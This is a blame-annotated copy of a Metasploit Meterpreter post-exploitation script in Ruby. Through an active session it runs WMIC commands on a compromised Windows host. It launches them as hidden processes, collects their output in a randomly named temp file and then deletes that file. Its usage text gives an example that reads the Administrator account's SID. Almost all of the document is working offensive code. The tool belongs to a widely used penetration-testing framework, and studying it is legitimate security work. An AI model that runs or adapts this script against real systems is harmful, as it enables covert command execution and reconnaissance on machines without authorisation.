2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2009-06-14 01:54:35 +00:00
|
|
|
#Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
|
|
|
|
# and Windows XP and Windows 2008 targets.
|
|
|
|
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
|
|
|
|
#Verion: 0.1
|
|
|
|
################## Variable Declarations ##################
|
|
|
|
session = client
|
|
|
|
wininfo = client.sys.config.sysinfo
|
|
|
|
# Setting Arguments
|
|
|
|
@@exec_opts = Rex::Parser::Arguments.new(
|
2009-10-25 17:44:53 +00:00
|
|
|
"-h" => [ false,"Help menu." ],
|
|
|
|
"-c" => [ true,"Command to execute. The command must be enclosed in double quotes."],
|
|
|
|
"-f" => [ true,"File where to saved output of command."],
|
|
|
|
"-s" => [ true,"Text file with list of commands, one per line."]
|
2009-06-14 01:54:35 +00:00
|
|
|
)
|
|
|
|
#Setting Argument variables
|
|
|
|
commands = []
|
|
|
|
script = []
|
|
|
|
outfile = nil
|
|
|
|
|
|
|
|
################## Function Declarations ##################
|
|
|
|
# Function for running a list of WMIC commands stored in a array, returs string
|
|
|
|
def wmicexec(session,wmiccmds= nil)
|
2009-10-25 17:44:53 +00:00
|
|
|
windr = ''
|
|
|
|
tmpout = ''
|
|
|
|
windrtmp = ""
|
|
|
|
session.response_timeout=120
|
|
|
|
begin
|
|
|
|
tmp = session.fs.file.expand_path("%TEMP%")
|
|
|
|
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
|
|
|
|
wmiccmds.each do |wmi|
|
|
|
|
print_status "running command wmic #{wmi}"
|
2009-06-20 17:47:37 +00:00
|
|
|
puts wmicfl
|
2009-10-25 17:44:53 +00:00
|
|
|
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
|
|
|
|
sleep(2)
|
|
|
|
#Making sure that wmic finnishes before executing next wmic command
|
|
|
|
prog2check = "wmic.exe"
|
|
|
|
found = 0
|
|
|
|
while found == 0
|
|
|
|
session.sys.process.get_processes().each do |x|
|
|
|
|
found =1
|
|
|
|
if prog2check == (x['name'].downcase)
|
|
|
|
sleep(0.5)
|
2009-06-14 01:54:35 +00:00
|
|
|
print_line "."
|
2009-10-25 17:44:53 +00:00
|
|
|
found = 0
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
r.close
|
|
|
|
end
|
|
|
|
# Read the output file of the wmic commands
|
|
|
|
wmioutfile = session.fs.file.new(wmicfl, "rb")
|
|
|
|
until wmioutfile.eof?
|
|
|
|
tmpout << wmioutfile.read
|
|
|
|
end
|
|
|
|
wmioutfile.close
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error running WMIC commands: #{e.class} #{e}")
|
|
|
|
end
|
|
|
|
# We delete the file with the wmic command output.
|
|
|
|
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
|
|
|
|
c.close
|
|
|
|
tmpout
|
2009-06-14 01:54:35 +00:00
|
|
|
end
|
|
|
|
# Function for writing results of other functions to a file
|
|
|
|
def filewrt(file2wrt, data2wrt)
|
2009-10-25 17:44:53 +00:00
|
|
|
output = ::File.open(file2wrt, "a")
|
|
|
|
data2wrt.each_line do |d|
|
|
|
|
output.puts(d)
|
|
|
|
end
|
|
|
|
output.close
|
2009-06-14 01:54:35 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def usage
|
|
|
|
print_line("Windows WMIC Command Execution Meterpreter Script ")
|
|
|
|
puts @@exec_opts.usage
|
2009-10-25 17:44:53 +00:00
|
|
|
print_line("USAGE:")
|
|
|
|
print_line("run wmic -c \"WMIC Command Argument\"\n")
|
2009-06-14 01:54:35 +00:00
|
|
|
print_line("NOTE:")
|
|
|
|
print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
|
2009-10-11 17:30:24 +00:00
|
|
|
print_line("for output retrieval. Arguments must be encased in double quotes and special characters escaped\n")
|
2009-06-14 01:54:35 +00:00
|
|
|
print_line("Example:")
|
|
|
|
print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
|
|
|
|
end
|
2009-10-25 18:36:47 +00:00
|
|
|
|
2009-06-14 01:54:35 +00:00
|
|
|
################## Main ##################
|
|
|
|
@@exec_opts.parse(args) { |opt, idx, val|
|
2009-10-25 17:44:53 +00:00
|
|
|
case opt
|
|
|
|
when "-c"
|
2009-10-25 18:36:47 +00:00
|
|
|
if !val
|
|
|
|
raise "-c requires an argument"
|
|
|
|
end
|
|
|
|
commands.concat(val.split("/"))
|
2009-10-25 17:44:53 +00:00
|
|
|
when "-s"
|
2009-10-25 18:36:47 +00:00
|
|
|
if !val
|
|
|
|
raise "-s requires an argument"
|
|
|
|
end
|
2009-10-25 17:44:53 +00:00
|
|
|
script = val
|
|
|
|
if not ::File.exists?(script)
|
|
|
|
raise "Command List File does not exists!"
|
|
|
|
else
|
|
|
|
::File.open(script, "r").each_line do |line|
|
|
|
|
commands << line.chomp
|
|
|
|
end
|
|
|
|
end
|
|
|
|
when "-f"
|
2009-10-25 18:36:47 +00:00
|
|
|
if !val
|
|
|
|
raise "-f requires an argument"
|
|
|
|
end
|
2009-10-25 17:44:53 +00:00
|
|
|
outfile = val
|
|
|
|
when "-h"
|
2009-10-25 18:36:47 +00:00
|
|
|
usage
|
|
|
|
raise RuntimeError, "Usage"
|
|
|
|
else
|
|
|
|
raise RuntimeError, "Unknown option: #{opt}"
|
2009-10-25 17:44:53 +00:00
|
|
|
end
|
2009-06-14 01:54:35 +00:00
|
|
|
|
2009-10-25 18:36:47 +00:00
|
|
|
if commands.empty?
|
|
|
|
usage
|
|
|
|
raise RuntimeError, "Empty command list"
|
|
|
|
end
|
2009-06-14 01:54:35 +00:00
|
|
|
}
|
|
|
|
|
2009-10-25 18:36:47 +00:00
|
|
|
if outfile == nil
|
2009-10-25 20:57:23 +00:00
|
|
|
print_status wmicexec(session,commands)
|
2009-06-14 01:54:35 +00:00
|
|
|
else
|
|
|
|
print_status("Saving output of WMIC to #{outfile}")
|
|
|
|
filewrt(outfile, wmicexec(session,commands))
|
|
|
|
end
|